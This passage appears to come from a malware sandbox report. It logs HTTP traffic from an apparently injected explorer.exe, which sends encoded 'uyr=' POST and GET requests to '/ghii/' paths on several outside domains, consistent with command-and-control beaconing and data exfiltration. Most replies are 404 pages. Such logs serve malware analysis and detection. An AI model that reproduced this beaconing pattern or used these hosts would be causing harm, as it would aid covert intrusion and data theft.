20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                  Feb 14, 2023 08:23:35.543752909 CET60INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                  Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                  Feb 14, 2023 08:23:35.543792009 CET61INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                  Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                  Feb 14, 2023 08:23:35.543822050 CET62INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                  Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                  Feb 14, 2023 08:23:35.543843985 CET63INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                  Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.54971166.96.162.14980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:23:40.764137030 CET64OUTPOST /ghii/ HTTP/1.1
                                                  Host: www.genuineinsights.cloud
                                                  Connection: close
                                                  Content-Length: 185
                                                  Cache-Control: no-cache
                                                  Origin: http://www.genuineinsights.cloud
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.genuineinsights.cloud/ghii/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 75 79 72 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 79 6c 48 66 4a 73 2d 79 6e 77 4a 62 75 4d 36 37 39 6f 4a 76 7a 45 4b 48 6f 49 72 61 53 32 72 4b 2d 59 66 63 36 44 6d 69 44 4b 58 38 2d 4d 4d 74 68 33 4c 48 62 54 6f 65 6b 78 58 67 56 34 31 42 65 56 5a 6e 56 73 49 32 6c 37 68 46 33 57 49 61 77 32 32 6d 2d 31 32 6b 59 4d 2d 64 56 51 69 5a 63 33 6e 74 31 47 70 4b 4c 57 7a 56 35 6f 58 66 48 4c 59 64 70 31 61 74 42 7e 65 30 4c 28 6a 59 61 6c 34 5a 5f 4d 6d 30 32 72 73 53 75 4b 76 6b 38 41 6b 63 32 45 65 36 4b 48 78 49 6e 62 4e 66 51 53 58 37 51 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: uyr=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8Akc2Ee6KHxInbNfQSX7Q).
                                                  Feb 14, 2023 08:23:40.875576019 CET65INHTTP/1.1 404 Not Found
                                                  Date: Tue, 14 Feb 2023 07:23:40 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 867
                                                  Connection: close
                                                  Server: Apache/2
                                                  Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                  Accept-Ranges: bytes
                                                  Age: 0
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.54971266.96.162.14980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:23:43.392874956 CET66OUTGET /ghii/?uyr=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0gyz2/IGepHjywiw==&IlOzNN=EyIBgfI12Z HTTP/1.1
                                                  Host: www.genuineinsights.cloud
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Feb 14, 2023 08:23:43.515486002 CET67INHTTP/1.1 404 Not Found
                                                  Date: Tue, 14 Feb 2023 07:23:43 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 867
                                                  Connection: close
                                                  Server: Apache/2
                                                  Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                  Accept-Ranges: bytes
                                                  Age: 0
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.54971366.160.197.7680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:23:48.758982897 CET69OUTPOST /ghii/ HTTP/1.1
                                                  Host: www.octohoki.net
                                                  Connection: close
                                                  Content-Length: 185
                                                  Cache-Control: no-cache
                                                  Origin: http://www.octohoki.net
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.octohoki.net/ghii/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 75 79 72 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 79 4e 6d 72 33 42 34 79 59 54 51 58 45 59 56 35 79 37 45 37 47 5a 4a 4e 63 41 77 4c 59 62 6f 54 41 43 56 37 45 59 4e 4f 49 4c 6c 41 74 35 35 63 64 4f 64 59 31 7a 71 51 34 36 59 6f 4c 50 4e 42 4d 67 51 4f 44 30 59 78 55 35 6d 4c 37 49 6d 47 71 45 6b 70 35 46 35 38 47 67 45 76 58 75 64 2d 4b 5a 32 31 30 64 6a 6e 37 50 76 35 45 75 51 63 73 43 52 53 58 67 35 54 45 49 76 35 41 53 66 39 76 46 31 49 55 6a 4d 68 75 6b 53 6b 4d 43 5a 77 71 78 4a 6d 49 48 52 56 73 70 38 51 34 4b 4c 43 5a 52 6c 78 49 51 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: uyr=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmIHRVsp8Q4KLCZRlxIQ).
                                                  Feb 14, 2023 08:23:49.393743038 CET70INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 14 Feb 2023 07:23:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.1.33
                                                  Content-Encoding: gzip
                                                  Data Raw: 31 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5d 52 4d 8f 9b 30 10 bd f3 2b 66 c9 35 84 90 26 55 05 04 a9 da 56 ed 61 ab ae da f4 d0 e3 60 06 b0 62 6c 6a 9b dd a5 d5 fe f7 da c0 76 d3 80 84 f1 cc 7b 6f 3e f3 9b 0f 5f 6f 4f 3f ef 3f c2 e7 d3 97 bb 22 c8 5b db 09 7f 10 56 ee e8 c8 22 b4 d6 f6 11 fd 1a f8 c3 31 bc 55 d2 92 b4 d1 69 ec 29 04 36 df 8e a1 a5 27 1b 7b 6a 06 ac 45 6d c8 1e 07 5b 47 ef 42 88 9d 8a e5 56 50 71 8f 0d 81 54 16 6a 35 c8 2a 8f 67 6b 90 1b 3b 0a 02 eb 04 17 1d 66 4c 58 04 a5 aa c6 e0 4f 00 ee 29 91 9d 1b ed 59 e9 aa ae 89 11 cb bc 39 78 0e 56 3e 03 e4 92 f4 02 f5 02 11 0a de c8 14 98 4b 8d 74 e6 61 9d c3 38 c4 04 a9 b8 e9 05 8e 29 70 29 1c 33 2a 85 62 e7 6c 72 31 25 94 4e 57 87 c3 61 be 97 4a 57 a4 23 8d 15 1f 4c 9a 6c fb a7 d9 5e bb a8 51 8d 1d 17 63 7a c2 56 75 b8 fe 44 92 1e 70 fd 5e 73 14 6b 83 d2 44 86 34 af b3 09 6a f8 6f 4a 93 e4 85 de 63 55 71 d9 4c 82 f0 fa 79 f3 f6 05 d0 a1 6e b8 5c 02 3e 07 6d b2 54 f7 2a 06 c9 61 7b 85 76 22 5e 65 eb df 6c 2e d5 71 83 76 77 d9 1a ab 5d 6a b5 d2 5d 3a f4 3d 69 86 86 7c 84 20 8f a7 31 b8 71 c4 cb e8 7d ff 8b 89 98 57 fc 01 78 75 0c ff 35 3b 9c 1d ff 39 7d 8b 2f ec 93 af 4d 8a fd 76 ef 24 93 6b c7 ae f8 ae b4 1e 6f c0 b6 68 5d 43 dc 6a 30 94 d3 7a 94 34 6f c8 66 b3 71 cc dd 35 73 5f 9c 5a 82 1f df ee e0 11 0d 10 b7 2d 69 37 4a e6 e4 88 d9 35 8c 6a 00 ab d4 19 10 1e b5 92 0d 34 03 19 03 4a 83 47 12 70 e3 3c 96 58 2b 39 43 01 bd 56 a5 a0 ce 87 da 5f 54 15 bb b2 96 ea e7 df 3c 9e 1b 92 4f 6b 5e fc 05 68 d8 17 f9 38 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 1f1]RM0+f5&UVa`bljv{o>_oO??"[V"1Ui)6'{jEm[GBVPqTj5*gk;fLXO)Y9xV>Kta8)p)3*blr1%NWaJW#Ll^QczVuDp^skD4joJcUqLyn\>mT*a{v"^el.qvw]j]:=i| 1q}Wxu5;9}/Mv$koh]Cj0z4ofq5s_Z-i7J5j4JGp<X+9CV_T<Ok^h80


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.54971466.160.197.7680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:23:51.479305029 CET70OUTGET /ghii/?IlOzNN=EyIBgfI12Z&uyr=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoVIj1yavarUZuxw== HTTP/1.1
                                                  Host: www.octohoki.net
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Feb 14, 2023 08:23:52.106976032 CET72INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 14 Feb 2023 07:23:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.1.33
                                                  Data Raw: 33 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 0a 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 65 63 65 63 3b 20 20 20 20 0a 7d 0a 23 63 6f 6e 74 61 69 6e 65 72 0a 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 23 6d 61 69 6e 0a 7b 0a 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 35 35 35 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 47 65 6e 65 76 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 30 70 78 20 31 30 70 78 20 33 36 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 30 70 78 3b 0a 7d 0a 68 31 0a 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 30 70 78 20 30 20 30 20 30 3b 0a 0a 20 20 20 20 0a 7d 0a 0a 68 32 0a 7b 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 6f 72 72 79 21 20 74 68 61 74 20 70 61 67 65 20 63 61 6e 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 2e 2e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 34 3e 54 68 65 20 55 52 4c 20 77 61 73 20 65 69 74 68 65 72 20 69 6e 63 6f 72 72 65 63 74 2c 20 79 6f 75 20 74 6f 6f 6b 20 61 20 77 72 6f 6e 67 20 67 75 65 73 73 20 6f 72 20 74 68 65 72 65 20 69 73 20 61 20 74 65 63 68 6e 69 63 61 6c 20 70 72 6f 62 6c 65 6d 2e 3c 2f 68 34 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 338<!DOCTYPE HTML><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Page not found</title><style type="text/css">body{ background:#ffecec; }#container{ text-align: center;}#main{ display: inline-block; color:#555; border-radius:10px; font-family:Tahoma,Geneva,Arial,sans-serif;font-size:11px; padding:10px 10px 10px 36px; margin:10px;}h1{ font-size: 150px; margin: 100px 0 0 0; }h2{ text-transform:uppercase;}</style></head><body> <div id="container"> <div id="main"> <h1>404</h1> <h2>Sorry! that page can not be found...</h2> <h4>The URL was either incorrect, you took a wrong guess or there is a technical problem.</h4> </div> </div></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.54971666.235.200.14680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:23:58.253298044 CET80OUTPOST /ghii/ HTTP/1.1
                                                  Host: www.ladybillplanet.com
                                                  Connection: close
                                                  Content-Length: 185
